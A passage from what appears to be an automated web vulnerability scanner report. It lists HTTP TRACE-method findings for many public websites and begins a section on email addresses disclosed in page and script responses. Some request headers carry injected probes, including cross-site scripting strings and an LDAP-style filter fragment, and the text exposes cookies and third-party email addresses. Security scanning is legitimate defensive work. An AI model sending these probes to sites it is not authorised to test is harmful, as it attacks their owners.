Host: advertising.aol.com
Cookie: 409e035ad7de2fbd

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: advertising.aol.com
Cookie: 409e035ad7de2fbd
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.2. http://amch.questionmarket.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 6ce88e51721b33b9

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:39:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 6ce88e51721b33b9
Connection: Keep-Alive


25.3. http://atl.whitepages.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /

Request

TRACE / HTTP/1.0
Host: atl.whitepages.com
Cookie: ed776e1c4467b782

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:27 GMT
X-DirectServer: whitepg_DS1
Content-Type: message/http
Content-Length: 72
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

TRACE / HTTP/1.0
Host: atl.whitepages.com
Cookie: ed776e1c4467b782


25.4. http://bassistance.de/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bassistance.de
Path:   /

Request

TRACE / HTTP/1.0
Host: bassistance.de
Cookie: 69191d9c42dd378e

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bassistance.de
Cookie: 69191d9c42dd378e


25.5. http://blogs.discovermagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.discovermagazine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: blogs.discovermagazine.com
Cookie: 301e5690c1ef0701

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:04 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.discovermagazine.com
Cookie: 301e5690c1ef0701


25.6. http://erik.eae.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://erik.eae.net
Path:   /

Request

TRACE / HTTP/1.0
Host: erik.eae.net
Cookie: 60cde813600d7a52

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:15 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e mod_fastcgi/2.4.6 DAV/2 SVN/1.5.1 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: erik.eae.net
Cookie: 60cde813600d7a52


25.7. http://eurekalert.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eurekalert.org
Path:   /

Request

TRACE / HTTP/1.0
Host: eurekalert.org
Cookie: e5159682a8af6bdf

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e5159682a8af6bdf
Host: eurekalert.org


25.8. http://javascript.nwbox.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://javascript.nwbox.com
Path:   /

Request

TRACE / HTTP/1.0
Host: javascript.nwbox.com
Cookie: ee0c1f27c3164845

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 09:01:58 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: javascript.nwbox.com
Cookie: ee0c1f27c3164845


25.9. http://jquery.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /

Request

TRACE / HTTP/1.0
Host: jquery.org
Cookie: bf6a8c3e21a78d47

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:08 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: jquery.org
Cookie: bf6a8c3e21a78d47


25.10. http://msnbcmedia.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbcmedia.redacted
Path:   /

Request

TRACE / HTTP/1.0
Host: msnbcmedia.redacted
Cookie: d9e748ab16067d86

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sun, 30 Jan 2011 02:16:31 GMT
Content-Type: message/http
Content-Length: 111
Expires: Sun, 30 Jan 2011 02:16:31 GMT
Connection: close

TRACE / HTTP/1.0
Host: msnbcmedia.redacted
Cookie: d9e748ab16067d86
_FP_X_URL: http://msnbcmedia.redacted/


25.11. http://nasaengineer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nasaengineer.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nasaengineer.com
Cookie: d1cac23b58b90b24

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:56 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 PHP-CGI/0.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d1cac23b58b90b24
Host: nasaengineer.com


25.12. http://planetary.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://planetary.org
Path:   /

Request

TRACE / HTTP/1.0
Host: planetary.org
Cookie: c5c950d6171222e1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:47 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: planetary.org
Cookie: c5c950d6171222e1


25.13. http://seedmagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seedmagazine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: seedmagazine.com
Cookie: 9622599b45620037

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:02 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: seedmagazine.com
Cookie: 9622599b45620037


25.14. http://trueslant.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trueslant.com
Path:   /

Request

TRACE / HTTP/1.0
Host: trueslant.com
Cookie: db3988582f75a100

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:01:15 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
Connection: close
Content-Type: message/http
Set-Cookie: TSSESSID=ts-www0; path=/

TRACE / HTTP/1.0
Host: trueslant.com
Cookie: db3988582f75a100
X-Forwarded-For: 173.193.214.243


25.15. http://widgets.digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 4dd16b8c78cf8eff

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:03 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 4dd16b8c78cf8eff
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.142.14
x-chpd-loop: 1
Via: 1.0 PXY003-DALL.COTENDO.NET (chpd/3
...[SNIP]...

25.16. http://www.aim.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aim.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: 591c6ebd366fd02a

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: 591c6ebd366fd02a
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243


25.17. http://www.batstrading.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.batstrading.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.batstrading.com
Cookie: 5735f040767e1e88

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 234
Date: Sun, 30 Jan 2011 01:52:13 GMT
Age: 0
Connection: close
X-BATS: 1112151759

TRACE / HTTP/1.0
Host: www.batstrading.com
Cookie: 5735f040767e1e88
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8
X-Varnish: 1112151759
X-Forwarded-For: 173.193.214.243


25.18. http://www.cannex.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cannex.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cannex.com
Cookie: dadd1c08f1cd5690

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: dadd1c08f1cd5690
Host: www.cannex.com


25.19. http://www.dooce.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dooce.com
Cookie: 395680dce2efced4

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dooce.com
Cookie: 395680dce2efced4


25.20. http://www.interactivedata-rts.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interactivedata-rts.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.interactivedata-rts.com
Cookie: 2684a225c239a70c

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:39 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.interactivedata-rts.com
Cookie: 2684a225c239a70c


25.21. http://www.mozilla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mozilla.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mozilla.org
Cookie: 50c3841031fed89c

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Date: Sat, 29 Jan 2011 23:31:27 GMT
Connection: close
X-Cache-Info: not cacheable; request wasn't a GET or HEAD

TRACE / HTTP/1.0
Host: www.mozilla.org
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 50c3841031fed89c
Connection: Keep-Alive


25.22. http://www.popsci.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.popsci.com
Cookie: b797bae89f5d6272

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:22 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.popsci.com
Cookie: b797bae89f5d6272


25.23. http://www.scienceblogs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scienceblogs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.scienceblogs.com
Cookie: 1f3b6f49471069bb

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:56 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.scienceblogs.com
Cookie: 1f3b6f49471069bb


25.24. http://www.sciencenews.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sciencenews.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sciencenews.org
Cookie: 4ccd232250f0ed44

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:46 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sciencenews.org
Cookie: 4ccd232250f0ed44


25.25. http://www.six-telekurs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.six-telekurs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.six-telekurs.com
Cookie: 55056fa9b8236dc4

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:21 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.six-telekurs.com
Cookie: 55056fa9b8236dc4


25.26. http://www.spacedaily.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spacedaily.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.spacedaily.com
Cookie: b5069e6f69e32e8f

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 06:32:41 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.spacedaily.com
Cookie: b5069e6f69e32e8f


25.27. http://www.stylemepretty.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stylemepretty.com
Cookie: 58349650c2926a6b

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:25 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stylemepretty.com
Cookie: 58349650c2926a6b


25.28. http://www.terra.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.terra.com
Cookie: 88767bc2fa170a3e

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:33 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.terra.com
Cookie: 88767bc2fa170a3e


25.29. http://www.thespacereview.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thespacereview.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thespacereview.com
Cookie: 91f1185a8577c9f1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:35 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) PHP/4.0.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 91f1185a8577c9f1
Host: www.thespacereview.com


25.30. http://www.transterrestrial.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.transterrestrial.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.transterrestrial.com
Cookie: 9dad039183bb4329

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:47 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.transterrestrial.com
Cookie: 9dad039183bb4329


25.31. http://www.unmannedspaceflight.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unmannedspaceflight.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.unmannedspaceflight.com
Cookie: 6f2cbcc402bb28e8

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:43 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6f2cbcc402bb28e8
Host: www.unmannedspaceflight.com


25.32. http://www.zacks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zacks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zacks.com
Cookie: ef998b28f897a6ed

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:18 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zacks.com
Cookie: ef998b28f897a6ed


26. Email addresses disclosed
There are 158 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


26.1. http://ads.redacted/library/dap.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.redacted
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Host: ads.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Date: Sun, 30 Jan 2011 01:19:40 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Sep 2010 17:58:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 13856


var _daprr=new Array('http://rad.redacted/ADSAdClient31.dll?GetSAd=','http://a.rad.redacted/ADSAdClient31.dll?GetSAd=', 'http://b.rad.redacted/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

26.2. http://ads1.redacted/library/dap.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.redacted
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Host: ads1.redacted
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D
If-Modified-Since: Fri, 17 Sep 2010 17:58:18 GMT

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:24:32 GMT
Expires: Mon, 31 Jan 2011 19:33:24 GMT
Last-Modified: Fri, 17 Sep 2010 17:58:18 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13856


var _daprr=new Array('http://rad.redacted/ADSAdClient31.dll?GetSAd=','http://a.rad.redacted/ADSAdClient31.dll?GetSAd=', 'http://b.rad.redacted/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

26.3. http://ads1.redacted/library/dapbeta.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.redacted
Path:   /library/dapbeta.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dapbeta.js HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
If-Modified-Since: Tue, 19 Oct 2010 21:15:54 GMT
Host: ads1.redacted
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:45:16 GMT
Expires: Thu, 30 Dec 2010 10:04:37 GMT
Last-Modified: Tue, 19 Oct 2010 21:15:54 GMT
Cache-Control: max-age=43200
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 3737

function verifyDapResize(a){var b=dapMgr.adCont;!b[a].resizeCalled&&dap_Resize(b[a].ifrmid,b[a].w,b[a].h)}function dap_Resize(a,c,b){document.getElementById(a).width=c;document.getElementById(a).heigh
...[SNIP]...

26.4. http://alex-johnson.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alex-johnson.newsvine.com
Path:   /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: alex-johnson.newsvine.com
Proxy-Connection: keep-alive
Referer: http://alex-johnson.newsvine.com/?3e2c2%22-alert(1)-%224c5f2da1b50=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=325847da6769430ff5ec3a6f9466c9cb

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:52:10 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 22 Jul 2008 22:32:25 GMT
ETag: "17c51e-2f1b-452a465ed3040"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:52:10 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.5. http://athima-chansanchai.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://athima-chansanchai.newsvine.com
Path:   /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: athima-chansanchai.newsvine.com
Proxy-Connection: keep-alive
Referer: http://athima-chansanchai.newsvine.com/?a87ee%22-alert(1)-%222c5f9f4d1a4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=1d1d23b7294c7a0a950c54ae75d3a8dc

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:52:54 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 22 Jul 2008 22:32:25 GMT
ETag: "17c51e-2f1b-452a465ed3040"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:52:54 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.6. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bassistance.de
Path:   /jquery-plugins/jquery-plugin-validation/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /jquery-plugins/jquery-plugin-validation/ HTTP/1.1
Host: bassistance.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Cookie,Accept-Encoding
X-Pingback: http://bassistance.de/xmlrpc.php
WP-Super-Cache: Served legacy cache file
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 672388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:name@apple.com">name@apple.com</a> and <a href="mailto:name@pears.com">name@pears.com</a>
...[SNIP]...

26.7. http://blogs.discovermagazine.com/loom/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.discovermagazine.com
Path:   /loom/

Issue detail

The following email address was disclosed in the response:

Request

GET /loom/ HTTP/1.1
Host: blogs.discovermagazine.com
Accept: */*
Accept-Language: en
